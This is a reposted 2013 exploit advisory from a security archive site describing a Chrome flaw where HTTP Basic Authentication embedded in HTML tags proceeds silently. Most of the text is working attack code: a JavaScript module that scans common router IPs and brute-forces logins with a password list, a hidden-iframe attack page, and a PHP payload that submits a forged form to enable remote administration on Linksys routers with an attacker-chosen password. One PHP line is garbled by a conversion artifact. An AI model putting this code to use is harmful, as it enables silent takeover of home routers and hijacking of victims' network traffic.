首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome Silent HTTP Authentication
来源:vfocus.net 作者:T355 发布时间:2013-02-18  
VULNERABILITY DETAILS
The latest version of Google Chrome (Tested on Version 24.0.1312.57)
fails to properly recognize HTTP Basic Authentication when injected in
various HTML tags. As a result of this behavior Chrome will not alert
the user when HTTP Basic Authentication is taking place or when
credentials are rejected. This behavior is particularly concerning
with respect to small office and home routers. Such devices are easily
brute forced using this method. Many of these devices have the default
password enabled which brings me to part II of this bug. Silent HTTP
Authentication allows the attacker to log into the router and change
settings with no alerts and or warnings issued by Chrome. The end
result allows an attacker to brute force the router login, connect to
the router, enable remote administration and of course control all
information on the entire network via DNS attacks etc.
REPRODUCTION CASE
I have attached the following files:
 
=======================================
sploit.txt - Indicates the buggy code.
Bug 1 - (Stylesheet Method)
<link rel="stylesheet" href="http://admin:password@192.168.1.1/" type="text/css" />

Bug 2 - (IMG Method)
<img src="http://admin:password@192.168.1.1" />

Bug 3 - (iFrame Method)
var iframe = document.getElementById("loginFrame");
iframe.src = "http://admin:password@192.168.1.1";

=======================================
jquery.js - Used for real world scenario but not needed for bug.
jQuery v1.7.1 jquery.com 

=======================================
brute.js - Real world attack scenario for this bug.
//Settings
victim = "192.168.1.1";
user = "admin";

//Dont touch these
count = 1;
enabled = false;
payload = false;
passFound = 0;

//Password Array
pass = new Array("","admin","password","1234","netgear1","netgear","optimum","password","test","linksys","tech","123456","123456","password","123456789","welcome","ninja","abc123","qwerty","12345678","princess","sunshine","iloveyou","welcome","jesus","babygirl","12345","rockyou","Nichole","Daniel","money","monkey","freedom","654321","michael","1234567","love","master","ginger","11111","1234","dragon","batman","baseball","buster","starwars","dallas","summer","access","killer","mustang","2000","soccer","ranger","696969","tigger","pass","shadow","Jennifer","letmein","Joshua","merlin","Robert","hockey","666666","orange","jordan","trustno1","superman","computer","123123","thunder","internet","lifehack","0","gizmodo","whatever","cheese","nintendo","f You","blahblah","passwOrd","gawker","Password","pokemon","michelle","pepper","kotaku","F#ck","P#ssy","6969","1111","a##hole","golfer","austin","biteme","cowboy","silver","F#cker","bigdog","bl#wjob","yellow","131313","hello","please","scooter","dick","iwantu","sexy","panties","hammer","yankees");
var length = pass.length,
element = null;

function crackPass() {
	for (var i = 0; i < length; i++) {
		if(passFound == 0) {
			password = pass[i];
			jQuery('head').append('<link rel="stylesheet" onload="logPW(\'' + password + '\')" href="http://admin:' + password + '@' + victim + '" type="text/css" />');
		}
	}
}

function logPW(password) {
	if(passFound == 0) {
		alert("Your Router Passowrd is: " + password);
		//Log Into Router
		var iframe = document.getElementById("loginFrame");
		setTimeout(function() { iframe.src = "http://" + user + ":" + password + "@" + victim; }, 500);
		setTimeout(function() { window.location = "http://" + victim; }, 2000);
	}
	passFound = 1;
}


//Deploy Malicous Payload to Router (Enable Remote Administration)
function dropLoad(){
	var iframe = document.getElementById("loginFrame");
	setTimeout(function() {  iframe.src = "attack.php?ip=" + victim; }, 100);
	console.log("dropping payload");
}

//Enumeration Module Used to Discover Router Local IP Address
iplist = new Array("192.168.1.1","10.0.1.1","10.0.0.1","192.168.1.220","192.168.2.1","10.1.1.1","192.168.11.1","192.168.0.1","192.168.0.30","192.168.0.50","192.168.1.30","192.168.1.50","192.168.10.1","192.168.20.1","192.168.30.1","192.168.62.1","192.168.100.1","192.168.102.1","192.168.1.254","192.168.0.227","10.0.0.138","192.168.123.254","192.168.4.1","10.0.0.2");
counter = 0;
 
function enumerateRouter() {
   if(counter !== iplist.length){
        var ip = iplist[counter];
        counter++;
	} else {
		return false;
	}
	
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function () {
		if (xhr.readyState == 4 && xhr.status == 200) {
			//alert("success");
		}
	};

	xhr.open("POST", "http://" + ip, true);
	xhr.setRequestHeader("Content-type", "application/json; charset=utf-8");
	xhr.timeout = 1000;
	xhr.ontimeout = function () { console.log(ip + " FAIL"); enumerateRouter(); }
	xhr.onerror = function () { console.log(ip + " MATCH"); victim = ip; crackPass();  }
	xhr.send();
}

=======================================
index.html - HTML Attack Page
<!DOCTYPE html>
<html>
<head>
<script type='text/javascript' src='jquery.js?ver=1.7.1'></script>
<script type='text/javascript' src='brute.js'></script>
</head>
<body onload="enumerateRouter()">
<iframe name="loginFrame" id="loginFrame" src="about:blank" style="display:none;"></iframe>
</body>
</html>

=======================================
attack.php - Payload file for Linksys Routers.
<? 
//collect some info
$ip = 
___FCKpd___0
GET["ip"]; $wan =
___FCKpd___0
SERVER['REMOTE_ADDR']; ?> <html> <head> </head> <body onload="sendPayload()"> <FORM id=password name=password action="http://<? echo $ip; ?>/manage.tri" method=post> <input type=hidden name=remote_mgt_https value=0> <input type=hidden name=http_enable value=1> <input type=hidden name=https_enable value=0> <input type=hidden name=PasswdModify value=0> <input type=hidden name=http_passwd value=d6nw5v1x2pc7st9m> <input type=hidden name=http_passwdConfirm value=d6nw5v1x2pc7st9m> <input type=hidden name=_http_enable value=1> <input type=hidden name=web_wl_filter value=1> <input type=hidden name=remote_management value=1> <input type=hidden name=http_wanport value=5555> <input type=hidden name=upnp_enable value=1> <input type=hidden name=layout value=en> <input type="submit" value="submit"> </FORM> <script> function sendPayload(){ document.password.submit(); } </script> </body> </html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeFloat FTP 1.0 Raw Commands
·Microsoft Wuindows Movie Maker
·Windows Media Player 9.0.0 .wa
·Schneider Electric Accutech Ma
·Schneider Electric Accutech Ma
·MS13-005 HWND_BROADCAST PoC
·RealPlayer 16.0.0.282 (.html)
·Novell GroupWise Client gwcls1
·Windows Media Player 9.0.0 Loc
·Polycom HDX Telnet Authorizati
·MS12-037 Internet Explorer 8 S
·iRobosoft Internet Browser Mem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved